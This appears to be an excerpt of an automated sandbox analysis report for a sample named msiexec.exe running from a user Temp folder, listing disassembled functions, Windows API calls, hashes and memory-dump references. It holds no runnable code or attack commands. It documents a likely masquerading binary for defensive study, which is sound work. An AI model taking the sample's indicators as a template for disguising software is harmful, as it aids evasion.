            • Instruction ID: b014844320ad767dada11dd3629d5dc4f3fca22d365999f113298c01dbc1c66c
            • Opcode Fuzzy Hash: 0d017b4a1ff679f66b1b70c9321ccb7683fc271020f3e65c8c30c9d46f938ea0
            • Instruction Fuzzy Hash: B011C471904205EFDB15DF64CA889AE7BB4EF14348F20807FE442B72C1D2B88A45EB5A
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 452 401389-40138e 453 4013fa-4013fc 452->453 454 401390-4013a0 453->454 455 4013fe 453->455 454->455 457 4013a2-4013a3 call 401434 454->457 456 401400-401401 455->456 459 4013a8-4013ad 457->459 460 401404-401409 459->460 461 4013af-4013b7 call 40136d 459->461 460->456 464 4013b9-4013bb 461->464 465 4013bd-4013c2 461->465 466 4013c4-4013c9 464->466 465->466 466->453 467 4013cb-4013f4 MulDiv SendMessageA 466->467 467->453
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
            • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
            • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
            • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 468 4056e3-40570f GetFileAttributesA CreateFileA
            APIs
            • GetFileAttributesA.KERNEL32(00000003,00402C62,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 004056E7
            • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
            • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
            • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
            • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 00403094
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
            • Instruction ID: 43e3c0ed55451ca58d66c179b0d5cd373ba627774d09ad719adf1b780fd88a5d
            • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
            • Instruction Fuzzy Hash: F0E08631101119BBCF105E61AC00A9B3F9CEB05362F00C032FA04E5190D538DA14DBA5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 473 402b00-402b38 call 4029f6 call 402aeb RegOpenKeyExA
            APIs
            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Open
            • String ID:
            • API String ID: 71445658-0
            • Opcode ID: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
            • Instruction ID: 26822e9457f7499eaf47d686268157363fcd7c772d88ad4a089d565b944a1739
            • Opcode Fuzzy Hash: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
            • Instruction Fuzzy Hash: 4DE08CB6240108BFDB50EFA5ED4BFD677ECBB04340F008921B618EB091CA75E5809B68
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetFileAttributesA.KERNEL32(00000000,?,000000F0), ref: 004015A0
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: 809357781c56f2c76ef79b951587c5f6b4cfd4d6a7e3ad04df5d4f6c06b5662e
            • Instruction ID: fb11a27b057d952daa1a0232a569a569c421c01e2099f6af0567112f3631a007
            • Opcode Fuzzy Hash: 809357781c56f2c76ef79b951587c5f6b4cfd4d6a7e3ad04df5d4f6c06b5662e
            • Instruction Fuzzy Hash: 60D01273B08211D7DB50EFA59E4859D7664AB503A8B204637E512F11D0D2B98541A619
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DE9,?), ref: 004030BD
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
            • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
            • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
            • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403486
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CloseHandle
            • String ID:
            • API String ID: 2962429428-0
            • Opcode ID: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
            • Instruction ID: dd629d7ffa80b2531d7668e5a1a305395e4adc4893f6b58610a8e469f8d50dee
            • Opcode Fuzzy Hash: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
            • Instruction Fuzzy Hash: F8C01230504600E6D2246F759E0A6093A18574173AB904336B179B50F1C77C5901453E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetDlgItem.USER32(?,000003F9), ref: 00404710
            • GetDlgItem.USER32(?,00000408), ref: 0040471D
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404769
            • LoadBitmapA.USER32 ref: 0040477C
            • SetWindowLongA.USER32(?,000000FC,00404CFA), ref: 00404796
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047AA
            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047BE
            • SendMessageA.USER32 ref: 004047D3
            • SendMessageA.USER32 ref: 004047DF
            • SendMessageA.USER32 ref: 004047F1
            • DeleteObject.GDI32(?), ref: 004047F6
            • SendMessageA.USER32 ref: 00404821
            • SendMessageA.USER32 ref: 0040482D
            • SendMessageA.USER32 ref: 004048C2
            • SendMessageA.USER32 ref: 004048ED
            • SendMessageA.USER32 ref: 00404901
            • GetWindowLongA.USER32(?,000000F0), ref: 00404930
            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040493E
            • ShowWindow.USER32(?,00000005), ref: 0040494F
            • SendMessageA.USER32 ref: 00404A52
            • SendMessageA.USER32 ref: 00404AB7
            • SendMessageA.USER32 ref: 00404ACC
            • SendMessageA.USER32 ref: 00404AF0
            • SendMessageA.USER32 ref: 00404B16
            • ImageList_Destroy.COMCTL32(?), ref: 00404B2B
            • GlobalFree.KERNEL32(?), ref: 00404B3B
            • SendMessageA.USER32 ref: 00404BAB
            • SendMessageA.USER32 ref: 00404C54
            • SendMessageA.USER32 ref: 00404C63
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C83
            • ShowWindow.USER32(?,00000000), ref: 00404CD1
            • GetDlgItem.USER32(?,000003FE), ref: 00404CDC
            • ShowWindow.USER32(00000000), ref: 00404CE3
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
            • Instruction ID: 30a51c26aaa2b30bd696497e7e47c5adc9155ce2862f65cc436e234c57937e2f
            • Opcode Fuzzy Hash: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
            • Instruction Fuzzy Hash: D402AFB0A00208AFDB20DF55DD45AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetDlgItem.USER32(?,00000403), ref: 00404F47
            • GetDlgItem.USER32(?,000003EE), ref: 00404F56
            • GetClientRect.USER32 ref: 00404F93
            • GetSystemMetrics.USER32 ref: 00404F9B
            • SendMessageA.USER32 ref: 00404FBC
            • SendMessageA.USER32 ref: 00404FCD
            • SendMessageA.USER32 ref: 00404FE0
            • SendMessageA.USER32 ref: 00404FEE
            • SendMessageA.USER32 ref: 00405001
            • ShowWindow.USER32(00000000,?), ref: 00405023
            • ShowWindow.USER32(?,00000008), ref: 00405037
            • GetDlgItem.USER32(?,000003EC), ref: 00405058
            • SendMessageA.USER32 ref: 00405068
            • SendMessageA.USER32 ref: 00405081
            • SendMessageA.USER32 ref: 0040508D
            • GetDlgItem.USER32(?,000003F8), ref: 00404F65
              • Part of subcall function 00403DF3: SendMessageA.USER32 ref: 00403E01
            • GetDlgItem.USER32(?,000003EC), ref: 004050AA
            • CreateThread.KERNEL32(00000000,00000000,Function_00004E7C,00000000), ref: 004050B8
            • CloseHandle.KERNEL32(00000000), ref: 004050BF
            • ShowWindow.USER32(00000000), ref: 004050E3
            • ShowWindow.USER32(?,00000008), ref: 004050E8
            • ShowWindow.USER32(00000008), ref: 0040512F
            • SendMessageA.USER32 ref: 00405161
            • CreatePopupMenu.USER32 ref: 00405172
            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405187
            • GetWindowRect.USER32(?,?), ref: 0040519A
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004051BE
            • SendMessageA.USER32 ref: 004051F9
            • OpenClipboard.USER32(00000000), ref: 00405209
            • EmptyClipboard.USER32 ref: 0040520F
            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405218
            • GlobalLock.KERNEL32 ref: 00405222
            • SendMessageA.USER32 ref: 00405236
            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040524E
            • SetClipboardData.USER32 ref: 00405259
            • CloseClipboard.USER32 ref: 0040525F
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
            • String ID: {
            • API String ID: 590372296-366298937
            • Opcode ID: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
            • Instruction ID: ecf959edf644124ae9a18d4fa2a520563b4821934e06b5e1f2851b0e4fc8d151
            • Opcode Fuzzy Hash: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
            • Instruction Fuzzy Hash: FBA14870900208BFEB219FA1DD89AAE7F79FB08355F40407AFA05AA2A0C7755E41DF59
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403927
            • ShowWindow.USER32(?), ref: 00403944
            • DestroyWindow.USER32 ref: 00403958
            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403974
            • GetDlgItem.USER32(?,?), ref: 00403995
            • SendMessageA.USER32 ref: 004039A9
            • IsWindowEnabled.USER32(00000000), ref: 004039B0
            • GetDlgItem.USER32(?,00000001), ref: 00403A5E
            • GetDlgItem.USER32(?,00000002), ref: 00403A68
            • SetClassLongA.USER32(?,000000F2,?), ref: 00403A82
            • SendMessageA.USER32 ref: 00403AD3
            • GetDlgItem.USER32(?,00000003), ref: 00403B79
            • ShowWindow.USER32(00000000,?), ref: 00403B9A
            • EnableWindow.USER32(?,?), ref: 00403BAC
            • EnableWindow.USER32(?,?), ref: 00403BC7
            • GetSystemMenu.USER32 ref: 00403BDD
            • EnableMenuItem.USER32 ref: 00403BE4
            • SendMessageA.USER32 ref: 00403BFC
            • SendMessageA.USER32 ref: 00403C0F
            • lstrlenA.KERNEL32(00429FE0,?,00429FE0,0042E360), ref: 00403C38
            • SetWindowTextA.USER32(?,00429FE0), ref: 00403C47
            • ShowWindow.USER32(?,0000000A), ref: 00403D7B
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
            • String ID:
            • API String ID: 184305955-0
            • Opcode ID: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
            • Instruction ID: 552f9e5d3371f53337095c5be2d86efa37a563823f2766eb5c4291c6ef6876bd
            • Opcode Fuzzy Hash: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
            • Instruction Fuzzy Hash: B8C1B171604204AFD721AF62ED85E2B7F6CEB44706F40053EF941B51E1C779A942DB2E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
              • Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
              • Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            • lstrcatA.KERNEL32(1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035C6
            • lstrlenA.KERNEL32(hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ), ref: 0040363B
            • lstrcmpiA.KERNEL32(?,.exe,hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000), ref: 0040364E
            • GetFileAttributesA.KERNEL32(hjgjhad), ref: 00403659
            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 004036A2
              • Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977
            • RegisterClassA.USER32 ref: 004036E9
            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403701
            • CreateWindowExA.USER32 ref: 0040373A
            • ShowWindow.USER32(00000005,00000000), ref: 00403770
            • LoadLibraryA.KERNEL32(RichEd20), ref: 00403781
            • LoadLibraryA.KERNEL32(RichEd32), ref: 0040378C
            • GetClassInfoA.USER32(00000000,RichEdit20A,0042E300), ref: 0040379C
            • GetClassInfoA.USER32(00000000,RichEdit,0042E300), ref: 004037A9
            • RegisterClassA.USER32(0042E300), ref: 004037B2
            • DialogBoxParamA.USER32 ref: 004037D1
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
            • String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hjgjhad
            • API String ID: 914957316-3096183934
            • Opcode ID: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
            • Instruction ID: af9374935d7a54fd1dce6881c110e57d7cc589bc1fe1380e1b33b637fa7f222c
            • Opcode Fuzzy Hash: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
            • Instruction Fuzzy Hash: E161C571604204BAD220AF669D85F273EACE744759F40447FF941B22E1D779AD028B3E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F91
            • GetDlgItem.USER32(00000000,000003E8), ref: 00403FA5
            • SendMessageA.USER32 ref: 00403FC3
            • GetSysColor.USER32 ref: 00403FD4
            • SendMessageA.USER32 ref: 00403FE3
            • SendMessageA.USER32 ref: 00403FF2
            • lstrlenA.KERNEL32(?), ref: 00403FFC
            • SendMessageA.USER32 ref: 0040400A
            • SendMessageA.USER32 ref: 00404019
            • GetDlgItem.USER32(?,0000040A), ref: 0040407C
            • SendMessageA.USER32 ref: 0040407F
            • GetDlgItem.USER32(?,000003E8), ref: 004040AA
            • SendMessageA.USER32 ref: 004040EA
            • LoadCursorA.USER32 ref: 004040F9
            • SetCursor.USER32(00000000), ref: 00404102
